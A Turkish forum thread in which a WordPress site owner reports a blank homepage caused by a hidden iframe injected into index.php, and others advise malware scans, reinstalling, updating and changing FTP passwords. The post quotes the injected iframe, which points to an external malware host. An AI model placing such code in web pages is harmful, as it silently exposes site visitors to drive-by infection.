Wordpress'te açıkmı mı var?

bu gün aksam ve gelince siteyi bi açayım dedim ve açınca ana sayfa bembeyaz olmus.. Ftpden index.php yi kontrol edince index.php nin içi

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-
<iframe src="http://hab72230.mine.nu:8080/ts/in.cgi?open7" width=897 height=0 style="visibility: hidden"></iframe>

bu şekilde idi
tekrar wordpressin son sürümden bir önceki surumu pc de vardı onu yukledım
Sonra güncel sürümüne yükselttim sorun çözüldü ama .. index.php ye bu kodu kim nasıl yerleştirebilir. Reselimdeki diğer wordpress kurulu sitelere baktım onlarda herhangi bir şey . Ya bu internette yayılmaya başlayam bir şey ya da wp de açık var . Yine böyle bir şey yüzünden pr3 eğitim sitemi google zararlı içerik olarak algılamıstı.
ben bi anlam veremedim duruma. Diyeceğim o ki bilgisi olan arkaşlar bir şey yazabilir mi ya da daha once benzer bir durum başına gelen arkadaş oldu mu ?

Forumda iframe virüsü temizlemek için konular var onlara bak.bu iframe virüsü sanada bulaşmış..Allah nazardan saklasın bana dadanmadı daha.

wp açığıyla ilgili bi sorun değil kullandığın ftp proramıyla ilgili büyük ihtimalle..

bütün sayfalara Bulaşıyormuş :S siteyi zaten yeni kurdum ama bir sürü içerik girdim :S
neyse başa gelen çekilir bütün dosyaları silip tekrar kuracaz :S
Ftp Programı Filezilla

İlk Önce Malvera adlı trojan avcısını indir bilgisayarını bir güzel derin olarak tara trojan çıkacaktır kesin bunları tarama sonrası sil ve ardından virüs bulaşan tüm sitelerini tekrar kur yedeklerin varsa onları kullan.Birde ftp programı ile sitenize dosya alışverişi yaptınız mı sık bu virüs gelir sitenize.Abim Bilgisayarından dosyaları gönderiyor siteye biraz ağır oluyor ama temiz oluyor...

Diğerlerinde bir şey görünmüyor bulasan sitenin tum php ve html dosylarını sılıyorum .
bi pc taramsı yapıp tekrar yukluyeceğim

Merhaba,

WordPress'in 2.8.4 sürümü öncesindeki bir sürümünü kullanıyorsanız güncelleme yapmanızı öneririm, her ne kadar kodun sitenize bulaşma sebebinin açık olup olmadığı konusunda herhangi bir inceleme yapmadan bir şey söylemek mümkün olmasada, geçtiğimiz hafta WordPress tarafından yapılan açıklamada yeni bir açığın keşfedildiği ve tüm kullanıcıların 2.8.4 sürümüne güncelleme yapması önerildi.

WordPress kullanıcılarının dikkatine..

önerileriniz için teşekkürler ..
ftpdeki bütün php html dosyaları sildim ...
antilerle tarattıım .. reseldeki diğer sitelerin hepsini taradım ftp programının son sürümünü yükledim . wp nin son sürümü kurdum sql yedeğini yükledim ..
umarım bundan sonra bi daha bulaşmaz iframe:S

Temizledikten sonra FTP şifrenizi değiştirmeyi unutmayınız..